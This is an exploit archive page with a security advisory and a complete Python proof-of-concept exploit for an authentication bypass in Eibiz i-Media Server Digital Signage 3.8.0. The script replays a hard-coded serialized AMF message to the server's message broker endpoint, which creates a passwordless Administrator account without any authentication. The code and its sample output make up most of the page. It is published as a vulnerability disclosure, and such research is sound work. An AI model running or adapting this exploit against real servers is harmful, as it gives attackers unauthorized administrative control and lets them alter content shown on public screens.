what you don't know can hurt you

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass
Posted Aug 21, 2020
Authored by LiquidWorm | Site zeroscience.mk

Eibiz i-Media Server Digital Signage version 3.8.0 suffers from unauthenticated privilege escalation and arbitrary user creation vulnerability that allows authentication bypass. Once serialized, an AMF encoded object graph may be used to persist and retrieve application state or allow two endpoints to communicate through the exchange of strongly typed data. These objects are received by the server without validation and authentication and gives the attacker the ability to create any user with any role and bypass the security control in place and modify presented data on the screen/billboard.

tags | exploit, arbitrary
MD5 | fd7bb44dd6320c3825c09283301d799e

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass

Change Mirror Download
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF encoded object graph may be used to persist and retrieve
# application state or allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# and authentication and gives the attacker the ability to create any user with
# any role and bypass the security control in place and modify presented data on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# --Sending serialized object...
# --Replaying...
#
# ------------------------------------------------------
# Admin user 'waddup' successfully created. No password.
# ------------------------------------------------------
#
# =========================================================================================
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#

import time as go
import requests
import sys
import re

class __CreateAdmin__:

def __init__(self):
self.ep = "/messagebroker/amf"
self.agent = "CharlieChaplin"
self.amfpacket = None
self.bytecount = None
self.bytesdata = None
self.address = None
self.headers = None
self.usrname = None
self.ende = None

def usage(self):
if len(sys.argv) != 3:
self.me()
msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
brd = "-" * len(msg + "\x20")
print("\n" + brd)
print(msg)
print("\x20Usage: ./i-media.py [ip] [username]")
print(brd)
exit(12)
else:
self.address = sys.argv[1]
self.usrname = sys.argv[2]
if not "http" in self.address:
self.address = "http://{}".format(self.address)

def amf(self):
self.headers = {"User-Agent" : self.agent,
"Accept" : "*/*",
"Accept-Language" : "en-US,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Origin" : self.address,
"Connection" : "close",
"Referer" : self.address + "/main.swf",
"Content-Type" : "application/x-amf"}

self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
self.amfpacket += b"\x01\x06\x01\x06" ##################"
self.bytecount = len(self.usrname * 2) + 1
self.bytesdata = [self.bytecount]
self.amfpacket += "".join(map(chr, self.bytesdata))
self.amfpacket += (bytes(self.usrname.encode("utf-8")))
self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"
self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"
self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"
self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"
self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"
self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"
self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"
self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"
self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"
self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"
self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"
self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"
self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"
self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"

print("\n--Sending serialized object...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
go.sleep(2)
print("--Replaying...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
print
print("-" * len(self.ende))
print(self.ende)
print("-" * len(self.ende))

def me(self):
cc = """

/`,.,,,.
:.......,,
,.........7
,.........$
......:=+=$
I.....,,:~,.:
$.?7IZDDNNN~.
$$: 8D=:I D,
D~,7NI7DNN
DDD NNN:
D8.ININ;
D8?7DZS
.ZDNNND D
S..,.~8?,N OO77
N......,..$=77:+?=~8
:......,::=.I8?:+=.=+~++
=.......,:+$=+O:+==~~++++=
8...........~7D$::~..~====:++
I.............:+.....~~~=~:~+?
N,............. .+...,:~=+~~ :+=$
;....... ......, .,....,:=+:,..~=?
Z,,...... :............,::~~=...===I
=.......$ Z...... =~,,,,.,:~,...,7~=
+....... 8.....,.=~~~:.~~~=:~ ..:$==
,...... +,..,,:.=~:~+I:,+I=8:...=?~
,....., =...,,,8+=,:~=~I=~~ N...:+?
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?
8...... ,...7=Z$DN:?::=I~~$ =..,=+
...,..D ,....O88D,8D,:=:==+?? ...,:7
,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+
......8D .. .... :?~8D:.:~~=++ ..,~II
:....~D+: . . . ..,..==~===N +,.,=$
,. DDND.......... .,...,===+=N ..,+?Z
DD 88 .......... ....,..~+=~N ..,~?I
....... ,,.,,.:...=?? 8..~=I$
....... ...,,,,. ,:~= ..:=~?
........ ,.,,..,:.. I.:+?+D
....... .......,:,,8 ,..IN
........ .,.. ..,,:.: :8N
........ ... ..,::,, I+O
........ ......,:,. O.ZN
........ . . ...,,,,. D+
............ ....,,,. =
....... . ....,,, ?
....... .....,,, 7
...... . ..,,,, +
:..... ..,.,, 8
:....... =. .....,,,N 8
~....... D. .....,,,D 8
~....... D. . ...,,,O D
=.... .....,,Z ?`
+...... . :........,.$ +
I...... ........,.7 =
Z........ . . ....,,7 D
N..... ... . ........I 8
..... ... , ........I 8
...... . = .. .....I 7
:.. . ..7 8... .....I ?
Z.. D .. ....7 N NND88OOOOOOO88DN
O.. . .. ....O O D8OZ$77II777$$ZO8DN
... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN
.,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N
$.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN
... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN
... .?, I777IIIIIIIII7$~O8N NNNNN
8.... .I. ...7IIIIII7$Z8DD NNNNN
NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN
N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN
?,:..:,.=N I.....,,=I+ N8
~....,8

"""

j = 0
while j < len(cc):
char = cc[j]
sys.stdout.write(char)
go.sleep(10.0 / 100000.0)
j = j + 1

def main(self):
self.usage()
self.amf()

if __name__ == '__main__':
__CreateAdmin__().main()
Login or Register to add favorites

File Archive:

March 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    19 Files
  • 2
    Mar 2nd
    15 Files
  • 3
    Mar 3rd
    30 Files
  • 4
    Mar 4th
    13 Files
  • 5
    Mar 5th
    9 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close